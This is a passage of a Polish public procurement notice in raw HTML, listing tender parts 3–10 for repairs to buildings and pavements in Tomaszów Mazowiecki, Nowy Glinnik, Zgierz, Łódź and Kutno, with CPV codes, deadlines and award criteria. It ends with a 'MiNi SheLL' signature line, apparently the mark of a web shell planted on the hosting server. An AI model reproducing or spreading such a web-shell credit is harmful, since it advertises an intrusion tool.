Dla Zadania nr 2 budynek nr 35 w Tomaszowie Mazowieckim                                    
załącznik nr 10  do SIWZ przedmiar robót  i specyfikacja techniczna                                                                                      
3.Lokalizacja obiektu zadanie nr 2 budynek nr 35 w Tomaszowie Mazowieckim       ul. Piłsudskiego 72  , 97-200 Tomaszów Mazowiecki.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.42.11.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 60.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. termin realizacji zamówienia - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Wymiana chodników  w Tomaszowie Mazowieckim       ( zadanie nr 3 ).</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia jest  wymiana chodników w Tomaszowie Mazowieckim             ( zadanie nr 3 )
2.Szczegółowy opis przedmiotu zamówienia określa
Dla Zadania nr 3 chodniki w Tomaszowie Mazowieckim                                                                             załącznik nr 11  do SIWZ przedmiar robót  i specyfikacja techniczna   
3. Lokalizacja obiektu    zadanie nr 3 chodniki  w Tomaszowie Mazowieckim              ul. Piłsudskiego 72  , 97-200 Tomaszów Mazowiecki.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.23.32.60-9, 45.11.12.20-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 90.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. termin realizacji zamówienia - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Remont instalacji elektrycznej w budynku nr 45 w Nowym Glinniku (zadanie nr 4).</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia jest remont instalacji elektrycznej w budynku nr 45 w Nowym Glinniku (zadanie nr 4) .
2.Szczegółowy opis przedmiotu zamówienia określa
Dla Zadania nr 4 budynek nr 45 w Nowym Glinniku                                                                załącznik nr 12  do SIWZ przedmiar robót  i specyfikacja techniczna    
3. Lokalizacja obiektu  zadanie nr 4  budynek nr 45  w Nowym Glinniku                                                                 
Jednostka Wojskowa nr 4392 Nowy Glinnik  97-217 Lubochnia.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.31.60.00-5, 45.31.70.00-2, 45.30.00.00-0, 45.31.00.00-3, 45.31.11.00-1, 45.31.23.11-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 60.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. termin realizacji zamówienia - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Remont węzłów sanitarnych  w budynku nr 133 w Nowym Glinniku  (zadanie nr 5).</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia jest remont węzłów sanitarnych   w budynku nr 133 w Nowym Glinniku ( zadanie nr 5 )
2.Szczegółowy opis przedmiotu zamówienia określa
Dla Zadania nr 5 budynek nr  133 w Nowym Glinniku                                                                     załącznik nr 13  do SIWZ przedmiar robót  i specyfikacja techniczna   
3. Lokalizacja obiektu  zadanie nr 5   budynek  nr 45 , nr 133  w Nowym Glinniku                                                                 
Jednostka Wojskowa nr 4392 Nowy Glinnik  97-217 Lubochnia.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.33.00.00-9, 45.31.12.00-2, 45.45.30.00-7, 45.32.00.00-6, 45.43.11.00-8, 45.43.12.00-9, 45.42.11.31-1, 45.44.21.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 90.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. termin realizacji zamówienia - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Remont węzłów sanitarnych  w budynku nr 3                             w Zgierzu  (zadanie nr 6).</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia jest remont węzłów sanitarnych  w budynku nr 3                             w Zgierzu ( zadanie nr 6 ) 
2.Szczegółowy opis przedmiotu zamówienia określa
Dla Zadania nr 6 budynek nr  3 w Zgierzu                                                                      załącznik nr 14  do SIWZ przedmiar robót  i specyfikacja techniczna
3. Lokalizacja obiektu  zadanie nr 6  budynek nr 3 w Zgierzu
ul. Konstantynowska 85 , 95-100 Zgierz.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.40.00.00-1, 45.53.31.10-7, 45.42.00.00-7, 45.43.00.00-0, 45.44.00.00-3, 45.33.20.00-3, 45.26.00.00-7, 45.45.30.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 90.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. termin realizacji zamówienia - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Wymiana stolarki okiennej w  budynku nr 43 Łodzi  (zadanie nr 7).</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia jest wymiana stolarki okiennej w  budynku nr 43 Łodzi 
(zadanie nr 7) 
2.Szczegółowy opis przedmiotu zamówienia określa
Dla Zadania nr 7 budynek nr  43 w Łodzi                                                                     załącznik nr 15  do SIWZ przedmiar robót  i specyfikacja techniczna 
3. Lokalizacja obiektu  zadanie nr 7  budynek nr 43 w Łodzi  ul. 1-go Maja  90  ,  90-766 Łódź.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.42.10.00-4, 45.26.26.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 60.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. termin realizacji zamówienia - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Naprawa elewacji   w  budynku nr 4  w Łodzi (zadanie nr 8 ).</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest naprawa elewacji   w  budynku nr 4  w Łodzi         ( zadanie nr 8 )
2.Szczegółowy opis przedmiotu zamówienia określa 
Dla Zadania nr 8 budynek nr  4 w Łodzi                                                                     załącznik nr 16  do SIWZ przedmiar robót  i specyfikacja techniczna   
3. Lokalizacja obiektu  zadanie nr 8  budynek nr 4 w Łodzi  ul. 6-go Sierpnia 92 , 90-646 Łódź.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.44.21.00-8, 45.44.21.10-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 75.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. termin realizacji zamówienia - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Wykonanie robót malarskich  w  budynku RWKL  w Łodzi ( zadanie nr 9 ).</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia jest wykonanie robót malarskich  w  budynku RWKL  w Łodzi (zadanie nr 9 ) .
2.Szczegółowy opis przedmiotu zamówienia określa
Dla Zadania nr 9 budynek RWKL  w Łodzi                                                                     załącznik nr 17  do SIWZ przedmiar robót  i specyfikacja techniczna   
3. Lokalizacja obiektu   zadanie nr 9  budynek RWKL w Łodzi ul. Żeromskiego 113  , 94-294  Łódź.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.44.21.00-8, 45.26.26.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 60.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. termin realizacji zamówienia - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> Rozbiórka w  budynku nr 59 w Kutnie ( zadanie nr 10 ).</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia jest rozbiórka w  budynku nr 59 w Kutnie(zadanie nr 10 )
2.Szczegółowy opis przedmiotu zamówienia określa
Dla Zadania nr 10 budynek nr  59 w Kutnie                                                                   załącznik nr 18  do SIWZ przedmiar robót  i specyfikacja techniczna   
3. Lokalizacja obiektu  zadanie nr 10  budynek nr 59 Kutno 
99-300 Skład  Kutno ul. Bohaterów Walk nad Bzurą.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.11.00.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 60.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. termin realizacji zamówienia - 10</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com